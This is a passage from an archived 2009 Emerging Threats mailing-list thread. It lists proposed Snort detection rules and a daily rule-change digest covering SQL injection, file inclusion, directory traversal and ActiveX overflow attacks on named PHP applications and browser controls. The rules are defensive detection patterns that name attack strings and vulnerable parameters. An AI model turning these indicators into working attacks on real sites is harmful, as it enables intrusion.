*WEB-PHP QuickTeam qte_init.php qte_root Parameter Local File > Inclusion* > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP > QuickTeam qte_init.php qte_root Parameter Local File Inclusion"; > flow:to_server,established; content:"GET "; depth:4; > uricontent:"/bin/qte_init.php?"; nocase; uricontent:"qte_root="; nocase; > content:"../"; classtype:web-application-attack; > reference:url,secunia.com/advisories/34997/; > reference:url,milw0rm.com/exploits/8602; sid:2009524; rev:1;) > > 10. *WEB-ATTACKS Roxio CinePlayer SonicDVDDashVRNav.DLL ActiveX > Control Remote Buffer Overflow* > alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"WEB-ATTACKS > Roxio CinePlayer SonicDVDDashVRNav.DLL ActiveX Control Remote Buffer > Overflow"; flow:to_client,established; content:"clsid"; nocase; > content:"9F1363DA-0220-462E-B923-9E3C9038896F"; nocase; distance:0; > content:"DiskType"; nocase; classtype:web-application-attack; > reference:url,milw0rm.com/exploits/8824;reference:bugtraq,23412; > sid:2009637; rev:1;) > > 11. *WEB-PHP TotalCalendar config.php inc_dir Parameter Local File > Inclusion* > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP > TotalCalendar config.php inc_dir Parameter Local File Inclusion"; > flow:to_server,established; content:"GET "; depth:4; > uricontent:"/config.php?"; nocase; uricontent:"inc_dir="; nocase; > content:"../"; classtype:web-application-attack; > reference:bugtraq,34617; reference:url,milw0rm.com/exploits/8494; > sid:2009490; rev:1;) > > 12. 
*WEB-PHP Scripts For Sites EZ e-store searchresults.php where > Parameter SQL Injection* > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP > Scripts For Sites EZ e-store searchresults.php where Parameter SQL > Injection"; flow:to_server,established; content:"GET "; depth:4; > uricontent:"/SearchResults.php?"; nocase; uricontent:"where="; nocase; > uricontent:"UNION"; nocase; uricontent:"SELECT"; nocase; > pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; > reference:cve,CVE-2008-6242; reference:bugtraq,32039; > reference:url,milw0rm.com/exploits/6922; sid:2009491; rev:1;) > > 13. *WEB-PHP NotFTP config.php languages Parameter Local File Inclusion* > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP > NotFTP config.php languages Parameter Local File Inclusion"; > flow:to_server,established; content:"GET "; depth:4; > uricontent:"/config.php?"; nocase; uricontent:"newlang=kacper"; nocase; > uricontent:"languages[kacper][file]="; nocase; content:"../"; > classtype:web-application-attack; > reference:url,milw0rm.com/exploits/8504; reference:bugtraq,34636; > sid:2009492; rev:1;) > > 14. *WEB-PHP TotalCalendar cms_detect.php include Parameter Local File > Inclusion* > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP > TotalCalendar cms_detect.php include Parameter Local File Inclusion"; > flow:to_server,established; content:"GET "; depth:4; > uricontent:"/cms_detect.php?"; nocase; uricontent:"include="; nocase; > content:"../"; classtype:web-application-attack; > reference:url,milw0rm.com/exploits/8503; reference:bugtraq,34634; > sid:2009493; rev:1;) > > 15. 
*WEB-PHP AvailScript Article Script articles.php aIDS Parameter > SQL Injection* > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP > AvailScript Article Script articles.php aIDS Parameter SQL Injection"; > flow:to_server,established; content:"GET "; depth:4; > uricontent:"/articles.php?"; nocase; uricontent:"aIDS="; nocase; > uricontent:"UNION"; nocase; uricontent:"SELECT"; nocase; > pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; > reference:cve,CVE-2008-4371; > reference:url,secunia.com/advisories/31816/; > reference:url,milw0rm.com/exploits/6409; sid:2009494; rev:1;) > > 16. *WEB-PHP JobHut browse.php pk Parameter SQL Injection* > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP > JobHut browse.php pk Parameter SQL Injection"; > flow:to_server,established; content:"GET "; depth:4; > uricontent:"/browse.php?"; nocase; uricontent:"pk="; nocase; > uricontent:"UNION"; nocase; uricontent:"SELECT"; nocase; > pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; > reference:bugtraq,34300; reference:url,milw0rm.com/exploits/8318; > sid:2009495; rev:1;) > > 17. *WEB-PHP VS Panel showcat.php Cat_ID Parameter SQL Injection* > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP > VS Panel showcat.php Cat_ID Parameter SQL Injection"; > flow:to_server,established; content:"GET "; depth:4; > uricontent:"/showcat.php?"; nocase; uricontent:"Cat_ID="; nocase; > uricontent:"UNION"; nocase; uricontent:"SELECT"; nocase; > pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; > reference:bugtraq,34648; reference:url,milw0rm.com/exploits/8506; > sid:2009500; rev:1;) > > 18. 
*WEB-PHP Golabi index_logged.php cur_module Parameter Remote File > Inclusion* > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP > Golabi index_logged.php cur_module Parameter Remote File Inclusion"; > flow:to_server,established; content:"GET "; depth:4; > uricontent:"/index_logged.php?"; nocase; uricontent:"main_loaded="; > nocase; uricontent:"cur_module="; nocase; > pcre:"/cur_module=\s*(https?|ftps?|php)\:\//Ui"; > classtype:web-application-attack; > reference:url,milw0rm.com/exploits/8112; > reference:url,vupen.com/english/advisories/2009/0553; > reference:bugtraq,33916; sid:2009501; rev:1;) > > 19. *WEB-PHP 212cafe Board view.php qID Parameter SQL Injection* > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP > 212cafe Board view.php qID Parameter SQL Injection"; > flow:to_server,established; content:"GET "; depth:4; > uricontent:"/view.php?"; nocase; uricontent:"qID="; nocase; > uricontent:"UNION"; nocase; uricontent:"SELECT"; nocase; > pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; > reference:bugtraq,31426; reference:url,xforce.iss.net/xforce/xfdb/45428; > reference:url,milw0rm.com/exploits/6578; sid:7549; rev:1;) > > 20. *WEB-ATTACKS Roxio CinePlayer IAManager.dll ActiveX Control Buffer > Overflow* > alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"WEB-ATTACKS > Roxio CinePlayer IAManager.dll ActiveX Control Buffer Overflow"; > flow:to_client,established; content:"clsid"; nocase; > content:"EE1BBA18-F0C8-477E-8AC8-C28B94F1B7DC"; nocase; distance:0; > content:"SetIAPlayerName"; nocase; classtype:web-application-attack; > reference:url,xforce.iss.net/xforce/xfdb/50868; > reference:url,milw0rm.com/exploits/8835; sid:2009639; rev:1;) > > 21. 
*WEB-ATTACKS SAP AG SAPgui sapirrfc.dll ActiveX Control Buffer > Overflow* > alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"WEB-ATTACKS > SAP AG SAPgui sapirrfc.dll ActiveX Control Buffer Overflow"; > flow:to_client,established; content:"clsid"; nocase; > content:"77F12F8A-F117-11D0-8CF1-00A0C91D9D87"; nocase; distance:0; > content:"Accept"; nocase; classtype:web-application-attack; > reference:url,xforce.iss.net/xforce/xfdb/50977; reference:bugtraq,35256; > reference:url,milw0rm.com/exploits/8899; sid:7660; rev:1;) > > 22. *WEB-PHP ProjectCMS select_image.php dir Parameter Directory > Traversal* > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP > ProjectCMS select_image.php dir Parameter Directory Traversal"; > flow:to_server,established; content:"GET "; depth:4; > uricontent:"/imagelibrary/select_image.php?"; nocase; uricontent:"dir="; > nocase; content:"../"; classtype:web-application-attack; > reference:url,milw0rm.com/exploits/8608; reference:bugtraq,34816; > sid:7526; rev:1;) > > 23. *WEB-PHP ProjectCMS admin_theme_remove.php file Parameter Remote > Directory Delete* > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP > ProjectCMS admin_theme_remove.php file Parameter Remote Directory > Delete"; flow:to_server,established; content:"GET "; depth:4; > uricontent:"/admin_includes/admin_theme_remove.php?"; nocase; > uricontent:"file="; nocase; content:"../"; > classtype:web-application-attack; > reference:url,milw0rm.com/exploits/8608; reference:bugtraq,34816; > sid:7527; rev:1;) > > 24. 
*WEB-PHP X-BLC get_read.php section Parameter SQL Injection* > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP > X-BLC get_read.php section Parameter SQL Injection"; > flow:to_server,established; content:"GET "; depth:4; > uricontent:"/include/get_read.php?"; nocase; uricontent:"section="; > nocase; uricontent:"UNION"; nocase; uricontent:"SELECT"; nocase; > pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; > reference:url,milw0rm.com/exploits/8258; reference:bugtraq,34197; > sid:7528; rev:1;) > > 25. *WEB-PHP DMXReady Multiple Products upload_image_category.asp cid > Parameter SQL Injection* > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP > DMXReady Multiple Products upload_image_category.asp cid Parameter SQL > Injection"; flow:to_server,established; content:"GET "; depth:4; > uricontent:"/upload_image_category.asp?"; nocase; uricontent:"cid="; > nocase; uricontent:"UNION"; nocase; uricontent:"SELECT"; nocase; > pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; > reference:bugtraq,33253; reference:url,xforce.iss.net/xforce/xfdb/47959; > reference:url,milw0rm.com/exploits/7767; sid:7529; rev:1;) > > 26. *WEB-PHP BibCiter projects.php idp Parameter SQL Injection* > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP > BibCiter projects.php idp Parameter SQL Injection"; > flow:to_server,established; content:"GET "; depth:4; > uricontent:"/reports/projects.php?"; nocase; uricontent:"idp="; nocase; > uricontent:"UNION"; nocase; uricontent:"SELECT"; nocase; > pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; > reference:url,secunia.com/advisories/33555; reference:bugtraq,33329; > reference:url,milw0rm.com/exploits/7814; sid:7530; rev:1;) > > 27. 
*WEB-PHP BibCiter contacts.php idc Parameter SQL Injection* > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP > BibCiter contacts.php idc Parameter SQL Injection"; > flow:to_server,established; content:"GET "; depth:4; > uricontent:"/reports/contacts.php?"; nocase; uricontent:"idc="; nocase; > uricontent:"UNION"; nocase; uricontent:"SELECT"; nocase; > pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; > reference:url,secunia.com/advisories/33555; reference:bugtraq,33329; > reference:url,milw0rm.com/exploits/7814; sid:7531; rev:1;) > > 28. *WEB-PHP BibCiter users.php idu Parameter SQL Injection* > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP > BibCiter users.php idu Parameter SQL Injection"; > flow:to_server,established; content:"GET "; depth:4; > uricontent:"/reports/users.php?"; nocase; uricontent:"idu="; nocase; > uricontent:"UNION"; nocase; uricontent:"SELECT"; nocase; > pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; > reference:url,secunia.com/advisories/33555; reference:bugtraq,33329; > reference:url,milw0rm.com/exploits/7814; sid:7532; rev:1;) > > 29. *WEB-PHP phpDatingClub website.php page Parameter Local File > Inclusion* > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP > phpDatingClub website.php page Parameter Local File Inclusion"; > flow:to_server,established; content:"GET "; depth:4; > uricontent:"/website.php?"; nocase; uricontent:"page="; nocase; > content:"../"; classtype:web-application-attack; > reference:bugtraq,30176; reference:url,milw0rm.com/exploits/6037; > sid:7533; rev:1;) > > 30. 
*WEB-PHP SuperNews valor.php noticia Parameter SQL Injection* > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP > SuperNews valor.php noticia Parameter SQL Injection"; > flow:to_server,established; content:"GET "; depth:4; > uricontent:"/valor.php?"; nocase; uricontent:"noticia="; nocase; > uricontent:"UNION"; nocase; uricontent:"SELECT"; nocase; > pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; > reference:url,milw0rm.com/exploits/8255; reference:bugtraq,34195; > sid:7548; rev:1;) > > Looking forward for your comments, if any? > > > Thanks & Regards, > StillSecure > > > ------------------------------------------------------------------------ > > _______________________________________________ > Emerging-sigs mailing list > Emerging-sigs at emergingthreats.net > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs -- -------------------------------------------- Matthew Jonkman Emerging Threats Open Information Security Foundation (OISF) Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net http://www.openinformationsecurityfoundation.org -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From emerging at emergingthreats.net Mon Aug 10 16:00:12 2009 From: emerging at emergingthreats.net (emerging@emergingthreats.net) Date: Mon, 10 Aug 2009 16:00:12 -0400 (EDT) Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes Message-ID: <20090810200012.3DF1C4504A@goliath.jonkmans.com> [***] Results from Oinkmaster started Mon Aug 10 16:00:12 2009 [***] [+++] Added rules: [+++] 2009714 - ET WEB Script tag in URI, Possible Cross Site Scripting Attempt (emerging-web.rules) 2009715 - ET WEB Onmouseover= in URI - Likely Cross Site Scripting Attempt (emerging-web.rules) 2009716 - ET WEB_SPECIFIC ECShop user.php order_sn Parameter SQL Injection (emerging-web_sql_injection.rules) 2009717 - ET WEB_SPECIFIC 1024 CMS standard.php page_include Parameter Remote File Inclusion 
(emerging-web_sql_injection.rules) 2009718 - ET WEB_SPECIFIC AvailScript Photo Album Script pics.php sid Parameter SQL Injection (emerging-web_sql_injection.rules) 2009719 - ET WEB_SPECIFIC pHNews comments.php templates_dir Local File Inclusion (emerging-web_sql_injection.rules) 2009720 - ET WEB_SPECIFIC pHNews comments.php template Local File Inclusion (emerging-web_sql_injection.rules) 2009723 - ET WEB_SPECIFIC QuickTeam qte_web.php qte_web_path Parameter Remote File Inclusion (emerging-web_sql_injection.rules) 2009724 - ET WEB_SPECIFIC QuickTeam qte_init.php qte_root Parameter Local File Inclusion (emerging-web_sql_injection.rules) 2009725 - ET WEB_ACTIVEX Roxio CinePlayer SonicDVDDashVRNav.DLL ActiveX Control Remote Buffer Overflow (emerging-web.rules) 2009726 - ET WEB_SPECIFIC TotalCalendar config.php inc_dir Parameter Local File Inclusion (emerging-web_sql_injection.rules) 2009727 - ET WEB_SPECIFIC Scripts For Sites EZ e-store searchresults.php where Parameter SQL Injection (emerging-web_sql_injection.rules) 2009728 - ET WEB_SPECIFIC NotFTP config.php languages Parameter Local File Inclusion (emerging-web_sql_injection.rules) 2009729 - ET WEB_SPECIFIC TotalCalendar cms_detect.php include Parameter Local File Inclusion (emerging-web_sql_injection.rules) 2009730 - ET WEB_SPECIFIC JobHut browse.php pk Parameter SQL Injection (emerging-web_sql_injection.rules) 2009731 - ET WEB_SPECIFIC VS Panel showcat.php Cat_ID Parameter SQL Injection (emerging-web_sql_injection.rules) 2009733 - ET WEB_SPECIFIC Golabi index_logged.php cur_module Parameter Remote File Inclusion (emerging-web_sql_injection.rules) 2009734 - ET WEB_SPECIFIC 212cafe Board view.php qID Parameter SQL Injection (emerging-web_sql_injection.rules) 2009735 - ET WEB_ACTIVEX Roxio CinePlayer IAManager.dll ActiveX Control Buffer Overflow (emerging-web.rules) 2009736 - ET WEB_SPECIFIC ProjectCMS select_image.php dir Parameter Directory Traversal (emerging-web_sql_injection.rules) 2009737 - ET WEB_SPECIFIC 
ProjectCMS admin_theme_remove.php file Parameter Remote Directory Delete (emerging-web_sql_injection.rules) 2009738 - ET WEB_SPECIFIC X-BLC get_read.php section Parameter SQL Injection (emerging-web_sql_injection.rules) 2009739 - ET WEB_SPECIFIC DMXReady Multiple Products upload_image_category.asp cid Parameter SQL Injection (emerging-web_sql_injection.rules) 2009740 - ET WEB_SPECIFIC BibCiter projects.php idp Parameter SQL Injection (emerging-web_sql_injection.rules) 2009741 - ET WEB_SPECIFIC BibCiter contacts.php idc Parameter SQL Injection (emerging-web_sql_injection.rules) 2009742 - ET WEB_SPECIFIC BibCiter users.php idu Parameter SQL Injection (emerging-web_sql_injection.rules) 2009743 - ET WEB_SPECIFIC phpDatingClub website.php page Parameter Local File Inclusion (emerging-web_sql_injection.rules) 2009744 - ET WEB_SPECIFIC SuperNews valor.php noticia Parameter SQL Injection (emerging-web_sql_injection.rules) 2009745 - ET WEB_SPECIFIC Flatchat pmscript.php with Parameter Local File Inclusion (emerging-web_sql_injection.rules) 2009746 - ET WEB_SPECIFIC QuickTeam qte_web.php qte_web_path Parameter Local File Inclusion (emerging-web_sql_injection.rules) 2009747 - ET WEB_SPECIFIC AvailScript Article Script articles.php aIDS Parameter SQL Injection (emerging-web_sql_injection.rules) [+++] Added non-rule lines: [+++] -> Added to emerging-sid-msg.map (69): 2009714 || ET WEB Script tag in URI, Possible Cross Site Scripting Attempt || url,ha.ckers.org/xss.html 2009715 || ET WEB Onmouseover= in URI - Likely Cross Site Scripting Attempt || url,www.w3schools.com/jsref/jsref_onmouseover.asp 2009716 || ET WEB_SPECIFIC ECShop user.php order_sn Parameter SQL Injection || url,milw0rm.com/exploits/8548 || bugtraq,34733 2009717 || ET WEB_SPECIFIC 1024 CMS standard.php page_include Parameter Remote File Inclusion || url,milw0rm.com/exploits/8003 || url,vupen.com/english/advisories/2009/0360 2009718 || ET WEB_SPECIFIC AvailScript Photo Album Script pics.php sid Parameter SQL 
Injection || url,milw0rm.com/exploits/6411 || bugtraq,31085 2009719 || ET WEB_SPECIFIC pHNews comments.php templates_dir Local File Inclusion || bugtraq,19838 || url,milw0rm.com/exploits/6000 2009720 || ET WEB_SPECIFIC pHNews comments.php template Local File Inclusion || bugtraq,19838 || url,milw0rm.com/exploits/6000 2009723 || ET WEB_SPECIFIC QuickTeam qte_web.php qte_web_path Parameter Remote File Inclusion || url,milw0rm.com/exploits/8602 || url,secunia.com/advisories/34997/ 2009724 || ET WEB_SPECIFIC QuickTeam qte_init.php qte_root Parameter Local File Inclusion || url,milw0rm.com/exploits/8602 || url,secunia.com/advisories/34997/ 2009725 || ET WEB_ACTIVEX Roxio CinePlayer SonicDVDDashVRNav.DLL ActiveX Control Remote Buffer Overflow || bugtraq,23412 || url,milw0rm.com/exploits/8824 2009726 || ET WEB_SPECIFIC TotalCalendar config.php inc_dir Parameter Local File Inclusion || url,milw0rm.com/exploits/8494 || bugtraq,34617 2009727 || ET WEB_SPECIFIC Scripts For Sites EZ e-store searchresults.php where Parameter SQL Injection || url,milw0rm.com/exploits/6922 || bugtraq,32039 || cve,CVE-2008-6242 2009728 || ET WEB_SPECIFIC NotFTP config.php languages Parameter Local File Inclusion || bugtraq,34636 || url,milw0rm.com/exploits/8504 2009729 || ET WEB_SPECIFIC TotalCalendar cms_detect.php include Parameter Local File Inclusion || bugtraq,34634 || url,milw0rm.com/exploits/8503 2009730 || ET WEB_SPECIFIC JobHut browse.php pk Parameter SQL Injection || url,milw0rm.com/exploits/8318 || bugtraq,34300 2009731 || ET WEB_SPECIFIC VS Panel showcat.php Cat_ID Parameter SQL Injection || url,milw0rm.com/exploits/8506 || bugtraq,34648 2009733 || ET WEB_SPECIFIC Golabi index_logged.php cur_module Parameter Remote File Inclusion || bugtraq,33916 || url,vupen.com/english/advisories/2009/0553 || url,milw0rm.com/exploits/8112 2009734 || ET WEB_SPECIFIC 212cafe Board view.php qID Parameter SQL Injection || url,milw0rm.com/exploits/6578 || url,xforce.iss.net/xforce/xfdb/45428 || 
bugtraq,31426 2009735 || ET WEB_ACTIVEX Roxio CinePlayer IAManager.dll ActiveX Control Buffer Overflow || url,milw0rm.com/exploits/8835 || url,xforce.iss.net/xforce/xfdb/50868 2009736 || ET WEB_SPECIFIC ProjectCMS select_image.php dir Parameter Directory Traversal || bugtraq,34816 || url,milw0rm.com/exploits/8608 2009737 || ET WEB_SPECIFIC ProjectCMS admin_theme_remove.php file Parameter Remote Directory Delete || bugtraq,34816 || url,milw0rm.com/exploits/8608 2009738 || ET WEB_SPECIFIC X-BLC get_read.php section Parameter SQL Injection || bugtraq,34197 || url,milw0rm.com/exploits/8258 2009739 || ET WEB_SPECIFIC DMXReady Multiple Products upload_image_category.asp cid Parameter SQL Injection || url,milw0rm.com/exploits/7767 || url,xforce.iss.net/xforce/xfdb/47959 || bugtraq,33253 2009740 || ET WEB_SPECIFIC BibCiter projects.php idp Parameter SQL Injection || url,milw0rm.com/exploits/7814 || bugtraq,33329 || url,secunia.com/advisories/33555 2009741 || ET WEB_SPECIFIC BibCiter contacts.php idc Parameter SQL Injection || url,milw0rm.com/exploits/7814 || bugtraq,33329 || url,secunia.com/advisories/33555 2009742 || ET WEB_SPECIFIC BibCiter users.php idu Parameter SQL Injection || url,milw0rm.com/exploits/7814 || bugtraq,33329 || url,secunia.com/advisories/33555 2009743 || ET WEB_SPECIFIC phpDatingClub website.php page Parameter Local File Inclusion || url,milw0rm.com/exploits/6037 || bugtraq,30176 2009744 || ET WEB_SPECIFIC SuperNews valor.php noticia Parameter SQL Injection || bugtraq,34195 || url,milw0rm.com/exploits/8255 2009745 || ET WEB_SPECIFIC Flatchat pmscript.php with Parameter Local File Inclusion || bugtraq,34734 || url,milw0rm.com/exploits/8549 2009746 || ET WEB_SPECIFIC QuickTeam qte_web.php qte_web_path Parameter Local File Inclusion || url,milw0rm.com/exploits/8602 || url,secunia.com/advisories/34997/ 2009747 || ET WEB_SPECIFIC AvailScript Article Script articles.php aIDS Parameter SQL Injection || url,milw0rm.com/exploits/6409 || 
url,secunia.com/advisories/31816/ || cve,CVE-2008-4371 2404025 || ET DROP Known Bot C&C Server Traffic (group 26) || url,www.shadowserver.org 2405025 || ET DROP Known Bot C&C Traffic (group 26) - BLOCKING SOURCE || url,www.shadowserver.org 2500214 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (108) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500215 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (108) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500216 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (109) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500217 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (109) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500218 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (110) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500219 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (110) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500220 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (111) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500221 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (111) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500222 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (112) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500223 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (112) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500224 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (113) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500225 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (113) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500226 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (114) 
|| url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500227 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (114) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500228 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (115) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500229 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (115) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500230 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500231 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510214 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (108) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510215 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (108) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510216 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (109) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510217 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (109) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510218 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (110) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510219 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (110) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510220 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (111) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510221 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (111) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510222 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (112) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510223 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (112) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510224 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (113) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510225 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (113) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510226 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (114) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510227 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (114) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510228 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (115) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510229 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (115) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510230 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510231 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

-> Added to emerging-sid-msg.map.txt (69):
2009714 || ET WEB Script tag in URI, Possible Cross Site Scripting Attempt || url,ha.ckers.org/xss.html
2009715 || ET WEB Onmouseover= in URI - Likely Cross Site Scripting Attempt || url,www.w3schools.com/jsref/jsref_onmouseover.asp
2009716 || ET WEB_SPECIFIC ECShop user.php order_sn Parameter SQL Injection || url,milw0rm.com/exploits/8548 || bugtraq,34733
2009717 || ET WEB_SPECIFIC 1024 CMS standard.php page_include Parameter Remote File Inclusion || url,milw0rm.com/exploits/8003 || url,vupen.com/english/advisories/2009/0360
2009718 || ET WEB_SPECIFIC AvailScript Photo Album Script pics.php sid Parameter SQL Injection || url,milw0rm.com/exploits/6411 || bugtraq,31085
2009719 || ET WEB_SPECIFIC pHNews comments.php templates_dir Local File Inclusion || bugtraq,19838 || url,milw0rm.com/exploits/6000
2009720 || ET WEB_SPECIFIC pHNews comments.php template Local File Inclusion || bugtraq,19838 || url,milw0rm.com/exploits/6000
2009723 || ET WEB_SPECIFIC QuickTeam qte_web.php qte_web_path Parameter Remote File Inclusion || url,milw0rm.com/exploits/8602 || url,secunia.com/advisories/34997/
2009724 || ET WEB_SPECIFIC QuickTeam qte_init.php qte_root Parameter Local File Inclusion || url,milw0rm.com/exploits/8602 || url,secunia.com/advisories/34997/
2009725 || ET WEB_ACTIVEX Roxio CinePlayer SonicDVDDashVRNav.DLL ActiveX Control Remote Buffer Overflow || bugtraq,23412 || url,milw0rm.com/exploits/8824
2009726 || ET WEB_SPECIFIC TotalCalendar config.php inc_dir Parameter Local File Inclusion || url,milw0rm.com/exploits/8494 || bugtraq,34617
2009727 || ET WEB_SPECIFIC Scripts For Sites EZ e-store searchresults.php where Parameter SQL Injection || url,milw0rm.com/exploits/6922 || bugtraq,32039 || cve,CVE-2008-6242
2009728 || ET WEB_SPECIFIC NotFTP config.php languages Parameter Local File Inclusion || bugtraq,34636 || url,milw0rm.com/exploits/8504
2009729 || ET WEB_SPECIFIC TotalCalendar cms_detect.php include Parameter Local File Inclusion || bugtraq,34634 || url,milw0rm.com/exploits/8503
2009730 || ET WEB_SPECIFIC JobHut browse.php pk Parameter SQL Injection || url,milw0rm.com/exploits/8318 || bugtraq,34300
2009731 || ET WEB_SPECIFIC VS Panel showcat.php Cat_ID Parameter SQL Injection || url,milw0rm.com/exploits/8506 || bugtraq,34648
